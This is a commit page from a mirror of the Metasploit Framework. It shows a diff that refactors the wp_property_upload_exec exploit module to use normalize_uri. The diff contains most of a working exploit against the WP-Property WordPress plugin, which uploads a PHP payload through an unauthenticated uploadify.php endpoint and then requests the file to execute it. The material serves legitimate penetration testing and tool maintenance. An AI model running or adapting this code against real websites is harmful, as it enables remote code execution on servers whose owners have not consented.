infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3152 - Use normalize_uri for module wp_property_upload_exec

bug/bundler_fix
Christian Mehlmauer 2014-03-28 13:22:54 +01:00
parent 5458200434 0b766cd412
commit 94494e38e7
No known key found for this signature in database
GPG Key ID: BCFF4FA966BC32C7
1 changed files with 11 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
modules/exploits/unix/webapp/wp_property_upload_exec.rb
View File

@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
uri = target_uri.path uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify', 'uploadify.php')
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" 'uri' => uri
}) })
if not res or res.code != 200 if not res or res.code != 200
@ -70,8 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def exploit def exploit
uri = target_uri.path data_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-property', 'third-party', 'uploadify/')
uri << '/' if uri[-1,1] != '/' request_uri = normalize_uri(data_uri, 'uploadify.php')
peer = "#{rhost}:#{rport}" peer = "#{rhost}:#{rport}"
@ -80,13 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
data = Rex::MIME::Message.new data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"")
post_data = data.to_s post_data = data.to_s
print_status("#{peer} - Uploading payload #{@payload_name}") print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({ res = send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", 'uri' => request_uri,
'ctype' => "multipart/form-data; boundary=#{data.bound}", 'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data 'data' => post_data
}) })
@ -95,12 +94,16 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end end
upload_uri = res.body upload_uri = normalize_uri(res.body)
print_status("#{peer} - Executing payload #{@payload_name}") print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({ res = send_request_raw({
'uri' => upload_uri, 'uri' => upload_uri,
'method' => 'GET' 'method' => 'GET'
}) })
if res and res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Execution failed")
end
end end
end end